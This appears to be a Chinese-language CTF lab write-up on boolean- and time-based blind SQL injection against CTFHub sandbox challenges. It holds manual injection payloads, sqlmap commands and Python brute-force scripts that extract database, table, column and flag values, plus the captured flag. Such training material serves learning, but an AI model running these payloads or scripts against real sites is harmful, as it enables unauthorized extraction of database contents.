布尔盲注
Length()函数 返回字符串的长度
Substr()截取字符串,有三个参数,第一个是要截取的字符串,第二个是从第几个字符开始,第三个是一次截取多少个字符
ascii() 字符的ASCII码值
输入1 and 1=1
,回显query_success
,提示查询成功
输入1 and 1=2
,回显query_error
,数据库查询结果为空或者查询语句报错,回显error。
手工注入
1.首先判断数据库长度
?id=1 and length(database())>5 #query_error
?id=1 and length(database())=4 #query_success
说明数据库名字长度为4
2.继续看数据库名字
手注配合bp爆破
结果如下
?id=1 and ascii(substr(database(),1,1))=115
?id=1 and ascii(substr(database(),2,1))=113
?id=1 and ascii(substr(database(),3,1))=108
?id=1 and ascii(substr(database(),4,1))=105
数据库名为sqli
3.判断数据库中字段数
?id=1 and (select count(table_name) from information_schema.tables where table_schema=database())=2
该数据库中含有两张表
4.判断表名
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=119
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115
第一张表名为news
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=108
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=97
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=103
第二张表名为flag
5.判断flag表中字段名称
?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102
?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),2,1))=108
?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),3,1))=97
?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),4,1))=103
字段名为flag
sqlmap注入
爆数据库名
python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 --dbs
得到数据库名sqli
接着我们爆破表:
python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables
得到表名flag
查字段
python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns
查到flag表里面有个flag列
爆值
python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump
得到flag
python脚本注入
爆库名
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
url='http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/?id='
length=4
name = ''
for j in range(1,length+1):
for i in dic:
urls = url+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
r = requests.get(urls)
if 'query_success' in r.text:
name = name+i
print(name)
break
print('database_name:',name)
得到库名sqli
s
sq
sql
sqli
database_name: sqli
爆表
import requests
import string
dic = string.digits + string.ascii_letters
url='http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/?id='
list = []
for k in range(0,4):
name=''
for j in range(1,9):
for i in dic:
urls = url +'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
r = requests.get(urls)
if 'query_success' in r.text:
name = name+i
break
list.append(name)
print('table_name:',list)
两个表,分别为news和flag
table_name: ['news', 'flag', '', '']
查字段
import requests
import string
url='http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/?id='
dic = string.digits + string.ascii_letters
list = []
for k in range(0, 3):
name = ''
for j in range(1, 9):
for i in dic:
urls = url+ 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (k, j, i)
r = requests.get(urls)
if 'query_success' in r.text:
name = name + i
break
list.append(name)
print('column_name:', list)
字段名为flag
column_name: ['flag', '', '']
爆值
import requests
url='http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/?id='
name = ''
for j in range(1, 50):
for i in range(48, 126):
urls = url+ 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (j, i)
r = requests.get(urls)
if 'query_success' in r.text:
name = name + chr(i)
print(name)
break
print('flag:', name)
得到flag
ctfhub{8ce1bf6d1763687b88a521eb}
时间盲注
随便输了个1,提示什么都不返回
手工注入
1.时间盲注测数据库名字长度
?id=1 and if(length(database())=4,sleep(3),1)
说明数据库名长度为4
2.测数据库名字
?id=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)
?id=1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)
?id=1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)
?id=1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)
结合ascll码知数据库名为sqli
3.测字段数
?id=1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)
故数据库中有两张表
4.测表名
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=119,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115,sleep(3),1)
故第一张表的表名为news
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=108,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=97,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=103,sleep(3),1)
故第二张表的表名为flag
5.测flag表的字段数
?id=1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)
字段数为1
6.测字段
?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102,sleep(3),1)
?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=108,sleep(3),1)
?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=97,sleep(3),1)
?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=103,sleep(3),1)
故字段名为flag
脚本注入
爆库名
import requests
import string
import time
url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/?id='
name = ''
for i in range(1, 5):
for j in string.ascii_letters:
urls = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
time_start = time.time()
r = requests.get(urls)
time_end = time.time()
if time_end-time_start > 2:
name += j
break
print(name)
print('database_name:', name)
运行结果
s
sq
sql
sqli
database_name: sqli
爆表
import requests
import string
import time
url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/?id='
list = []
for i in range(0, 2):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
urls = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
time_start = time.time()
r = requests.get(urls)
time_end = time.time()
if time_end-time_start > 2:
name += k
break
list.append(name)
print('table_name:', list)
运行结果
table_name: ['news', 'flag']
爆字段
import requests
import string
import time
url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/?id='
list = []
for i in range(0, 1):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
urls = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
time_start = time.time()
r = requests.get(urls)
time_end = time.time()
if time_end - time_start > 2:
name += k
break
list.append(name)
print('column_name:', list)
运行结果
column_name: ['flag']
爆值
import requests
import string
import time
url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/?id='
name = ''
for i in range(1, 50):
for j in range(48, 126):
urls = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
r = requests.get(urls)
time_start = time.time()
r = requests.get(urls)
time_end = time.time()
if time_end-time_start > 2:
name += chr(j)
print(name)
break
print('data:', name)
时间太长了,爬,终于得到flag